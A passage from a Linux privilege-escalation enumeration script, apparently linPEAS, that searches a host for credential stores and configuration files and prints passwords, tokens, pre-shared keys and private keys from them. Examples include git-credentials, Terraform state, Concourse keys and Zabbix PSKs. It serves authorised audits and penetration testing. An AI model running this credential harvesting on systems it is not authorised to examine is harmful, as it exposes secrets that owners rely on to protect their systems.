"\.kdbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.kdbx$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_KEEPASS\" |
grep -E \"KeePass\.config.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"KeePass.config*"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E
"KeePass\.config.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,KeePass\.config.*$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "KeePass.ini"; fi; fi; printf "%s" "$PSTORAGE_KEEPASS" |
grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,KeePass\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "KeePass.enforced*"; fi; fi; printf "%s"
"$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo
""; fi if [ "$PSTORAGE_FTP" ] || [ "$DEBUG" ]; then print_2title "Analyzing FTP
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"vsftpd\.conf$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "vsftpd.conf"; fi; fi; printf "%s"
"$PSTORAGE_FTP" | grep -E "vsftpd\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,vsftpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | grep -E
"anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable"
| sed -${E}
"s,anonymous_enable|anon_upload_enable|anon_mkdir_write_enable|anon_root|chown_uploads|chown_username|local_enable|no_anon_password|write_enable|[yY][eE][sS],${SED_RED},g"
| sed -${E} "s,\s[nN][oO]|=[nN][oO],${SED_GOOD},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*.ftpconfig"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E
"\.ftpconfig$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.ftpconfig$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" |
grep -E \"ffftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"ffftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ffftp\.ini$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "ftp.ini"; fi; fi; printf "%s"
"$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null
| sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "ftp.config"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E
"ftp\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,ftp\.config$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" |
grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"sites.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "sites\.ini$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sites\.ini$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"wcx_ftp\.ini$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s"
"$PSTORAGE_FTP" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_FTP\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E
"winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,winscp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_FTP\" |
grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_VARNISH" ] || [
"$DEBUG" ]; then print_2title "Analyzing Varnish Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_VARNISH\" | grep -E \"varnish$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "varnish"; fi; fi; printf "%s" "$PSTORAGE_VARNISH" | grep -E
"varnish$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,varnish$,${SED_RED},"; find "$f" -name "default.vcl" | while read ff; do ls
-ld "$ff" | sed -${E} "s,default.vcl,${SED_RED},"; done; echo "";find "$f" -name
"secret" | while read ff; do ls -ld "$ff" | sed -${E} "s,secret,${SED_RED},";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_APACHE_AIRFLOW" ] || [ "$DEBUG"
]; then print_2title "Analyzing Apache-Airflow Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_APACHE_AIRFLOW\" | grep -E \"airflow\.cfg$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "airflow.cfg"; fi; fi; printf "%s"
"$PSTORAGE_APACHE_AIRFLOW" | grep -E "airflow\.cfg$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,airflow\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null
| grep -IEv "^$" | grep -Ev "^#" | sed -${E}
"s,access_control_allow_headers|access_control_allow_methods|access_control_allow_origins|auth_backend|backend.default|google_key_path.*|password|username|flower_basic_auth.*|result_backend.*|ssl_cacert|ssl_cert|ssl_key|fernet_key.*|tls_ca|tls_cert|tls_key|ccache|google_key_path|smtp_password.*|smtp_user.*|cookie_samesite|cookie_secure|expose_config|expose_stacktrace|secret_key|x_frame_enabled,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_APACHE_AIRFLOW\" | grep -E
\"webserver_config\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"webserver_config.py"; fi; fi; printf "%s" "$PSTORAGE_APACHE_AIRFLOW" | grep -E
"webserver_config\.py$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,webserver_config\.py$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_X11" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing X11 Files (limit 70)" if ! [
"`echo \"$PSTORAGE_X11\" | grep -E \"\.Xauthority$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found ".Xauthority"; fi; fi; printf "%s" "$PSTORAGE_X11" | grep -E
"\.Xauthority$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.Xauthority$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_ROCKETCHAT" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Rocketchat Files (limit 70)" if !
[ "`echo \"$PSTORAGE_ROCKETCHAT\" | grep -E \"rocketchat\.service$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "rocketchat.service"; fi; fi; printf "%s"
"$PSTORAGE_ROCKETCHAT" | grep -E "rocketchat\.service$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,rocketchat\.service$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -E -i "Environment" | sed -${E}
"s,mongodb://.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_RPCD" ] || [
"$DEBUG" ]; then print_2title "Analyzing Rpcd Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_RPCD\" | grep -E \"rpcd$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "rpcd"; fi; fi; printf "%s" "$PSTORAGE_RPCD" | grep -E "rpcd$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,rpcd$,${SED_RED},"; cat
"$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,username.+|password.+,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_BITCOIN" ] || [ "$DEBUG" ]; then print_2title "Analyzing Bitcoin
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_BITCOIN\" | grep -E
\"bitcoin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"bitcoin.conf"; fi; fi; printf "%s" "$PSTORAGE_BITCOIN" | grep -E
"bitcoin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,bitcoin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev
"^#" | sed -${E} "s,user=.*|password=.*|auth=.*,${SED_RED},g"; done; echo ""; fi
if [ "$PSTORAGE_GLUSTERFS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
GlusterFS Files (limit 70)" if ! [ "`echo \"$PSTORAGE_GLUSTERFS\" | grep -E
\"glusterfs\.pem$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"glusterfs.pem"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" | grep -E
"glusterfs\.pem$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,glusterfs\.pem$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.ca$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "glusterfs.ca"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" |
grep -E "glusterfs\.ca$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,glusterfs\.ca$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_GLUSTERFS\" | grep -E \"glusterfs\.key$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "glusterfs.key"; fi; fi; printf "%s" "$PSTORAGE_GLUSTERFS" |
grep -E "glusterfs\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,glusterfs\.key$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_TERRAFORM" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Terraform Files (limit 70)" if ! [
"`echo \"$PSTORAGE_TERRAFORM\" | grep -E \"\.tfstate$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "*.tfstate"; fi; fi; printf "%s" "$PSTORAGE_TERRAFORM" |
grep -E "\.tfstate$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.tfstate$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,secret.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_TERRAFORM\"
| grep -E \"\.tf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.tf"; fi;
fi; printf "%s" "$PSTORAGE_TERRAFORM" | grep -E "\.tf$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,\.tf$,${SED_RED},"; done; echo ""; fi if [
"$PSTORAGE_RACOON" ] || [ "$DEBUG" ]; then print_2title "Analyzing Racoon Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"racoon\.conf$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "racoon.conf"; fi; fi; printf "%s"
"$PSTORAGE_RACOON" | grep -E "racoon\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,racoon\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,pre_shared_key.*,${SED_RED},g";
done; echo ""; if ! [ "`echo \"$PSTORAGE_RACOON\" | grep -E \"psk\.txt$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "psk.txt"; fi; fi; printf "%s"
"$PSTORAGE_RACOON" | grep -E "psk\.txt$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,psk\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_ROAD_RECON" ] || [ "$DEBUG" ]; then print_2title "Analyzing Road
Recon Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ROAD_RECON\" | grep -E
\"\.roadtools_auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
".roadtools_auth"; fi; fi; printf "%s" "$PSTORAGE_ROAD_RECON" | grep -E
"\.roadtools_auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.roadtools_auth$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,accessToken.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_GRAFANA"
] || [ "$DEBUG" ]; then print_2title "Analyzing Grafana Files (limit 70)" if ! [
"`echo \"$PSTORAGE_GRAFANA\" | grep -E \"grafana\.ini$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "grafana.ini"; fi; fi; printf "%s" "$PSTORAGE_GRAFANA" |
grep -E "grafana\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,grafana\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev
"^#|^;" | sed -${E} "s,admin.*|username.*|password:*|secret.*,${SED_RED},g";
done; echo ""; fi if [ "$PSTORAGE_SIP" ] || [ "$DEBUG" ]; then print_2title
"Analyzing SIP Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E
\"sip\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sip.conf"; fi;
fi; printf "%s" "$PSTORAGE_SIP" | grep -E "sip\.conf$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,sip\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,secret.*|allowguest.*=.*true,${SED_RED},g"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"amportal\.conf$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "amportal.conf"; fi; fi; printf "%s"
"$PSTORAGE_SIP" | grep -E "amportal\.conf$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,amportal\.conf$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,.*PASS.*=.*,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_SIP\" | grep -E \"FreePBX\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "FreePBX.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep
-E "FreePBX\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,FreePBX\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
".*AMPDB.*=.*" | sed -${E} "s,.*AMPDB.*=.*,${SED_RED},g"; done; echo ""; if ! [
"`echo \"$PSTORAGE_SIP\" | grep -E \"Elastix\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "Elastix.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep
-E "Elastix\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,Elastix\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,.*pwd.*=.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_VIRTUAL_DISKS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Virtual Disks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep
-E \"\.vhd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhd"; fi; fi;
printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhd$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,\.vhd$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhdx$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "*.vhdx"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" |
grep -E "\.vhdx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.vhdx$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vmdk$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "*.vmdk"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" |
grep -E "\.vmdk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.vmdk$,${SED_RED},"; done; echo ""; fi if [ "$PSTORAGE_GIT" ] || [ "$DEBUG"
]; then print_2title "Analyzing Git Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_GIT\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GIT" |
grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,\.git-credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"
| sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_ATLANTIS" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Atlantis Files (limit 70)" if ! [
"`echo \"$PSTORAGE_ATLANTIS\" | grep -E \"atlantis\.db$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "atlantis.db"; fi; fi; printf "%s"
"$PSTORAGE_ATLANTIS" | grep -E "atlantis\.db$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,atlantis\.db$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,CloneURL|Username,${SED_RED},g"; done; echo ""; fi
if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then print_2title "Analyzing Opera
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E
\"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E
"com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep
-IEv "^$"; done; echo ""; fi if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Safari Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E
"Safari$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_FAT_FREE" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Fat-Free Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FAT_FREE\" | grep -E
\"fat\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fat.config";
fi; fi; printf "%s" "$PSTORAGE_FAT_FREE" | grep -E "fat\.config$" | while read
f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fat\.config$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -E "password.*" | sed -${E}
"s,password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_SHODAN" ] || [
"$DEBUG" ]; then print_2title "Analyzing Shodan Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_SHODAN\" | grep -E \"api_key$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "api_key"; fi; fi; printf "%s" "$PSTORAGE_SHODAN" | grep -E
"api_key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,api_key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
fi if [ "$PSTORAGE_CONCOURSE" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Concourse Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E
\"\.flyrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".flyrc"; fi; fi;
printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "\.flyrc$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,\.flyrc$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | sed -${E} "s,token:*|value:.*,${SED_RED},g"; done; echo ""; if
! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-auth$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "concourse-auth"; fi; fi; printf "%s"
"$PSTORAGE_CONCOURSE" | grep -E "concourse-auth$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,concourse-auth$,${SED_RED},"; find "$f" -name
"host-key" | while read ff; do ls -ld "$ff" | sed -${E}
"s,host-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "local-users" |
while read ff; do ls -ld "$ff" | sed -${E} "s,local-users,${SED_RED},"; cat
"$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo
"";find "$f" -name "session-signing-key" | while read ff; do ls -ld "$ff" | sed
-${E} "s,session-signing-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name
"worker-key-pub" | while read ff; do ls -ld "$ff" | sed -${E}
"s,worker-key-pub,${SED_RED},"; done; echo "";done; echo ""; if ! [ "`echo
\"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-keys$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "concourse-keys"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE"
| grep -E "concourse-keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,concourse-keys$,${SED_RED},"; find "$f" -name "host_key" | while read
ff; do ls -ld "$ff" | sed -${E} "s,host_key,${SED_RED},"; cat "$ff" 2>/dev/null
| grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo
"";find "$f" -name "session_signing_key" | while read ff; do ls -ld "$ff" | sed
-${E} "s,session_signing_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name
"worker_key.pub" | while read ff; do ls -ld "$ff" | sed -${E}
"s,worker_key.pub,${SED_RED},"; done; echo "";done; echo ""; fi if [
"$PSTORAGE_BOTO" ] || [ "$DEBUG" ]; then print_2title "Analyzing Boto Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_BOTO\" | grep -E \"\.boto$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_BOTO"
| grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG"
]; then print_2title "Analyzing InfluxDB Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" |
grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep
-Ev "^#" | sed -${E}
"s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo "";
fi if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Zabbix Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E
\"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E
"zabbix_server\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" |
grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf
"%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls
-ld "$f" 2>/dev/null | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E}
"s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E
"zabbix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld
"$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" |
sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [
"$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Pre-Shared Keys Files (limit 70)" if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" |
grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi;
fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; fi
if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Pass Store Directories Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s"
"$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.password-store$,${SED_RED},"; ls
-lRA "$f";done; echo ""; fi if [ "$PSTORAGE_SAMBA" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Samba Files (limit 70)" smbstatus 2>/dev/null if ! [
"`echo \"$PSTORAGE_SAMBA\" | grep -E \"smb\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "smb.conf"; fi; fi; printf "%s" "$PSTORAGE_SAMBA" | grep -E
"smb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,smb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"browseable|read only|writable|guest ok|enable privileges|create mask|directory
mask|logon script|magic script|magic output" | sed -${E} "s,browseable.*yes|read
only.*no|writable.*yes|guest ok.*yes|enable privileges.*yes|create
mask.*|directory mask.*|logon script.*|magic script.*|magic
output.*,${SED_RED},g" | sed -${E} "s,browseable.*no|read
only.*yes|writable.*no|guest ok.*no|enable privileges.*no,${SED_GOOD},g"; done;
echo ""; fi if [ "$PSTORAGE_DNS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
DNS Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DNS\" | grep -E \"bind$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s"
"$PSTORAGE_DNS" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null |
sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld
"$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" |
while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g";
done; echo "";find "$f" -name "named.conf*" | while read ff; do ls -ld "$ff" |
sed -${E} "s,named.conf.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" |
grep -Ev "^#|//" | sed -${E}
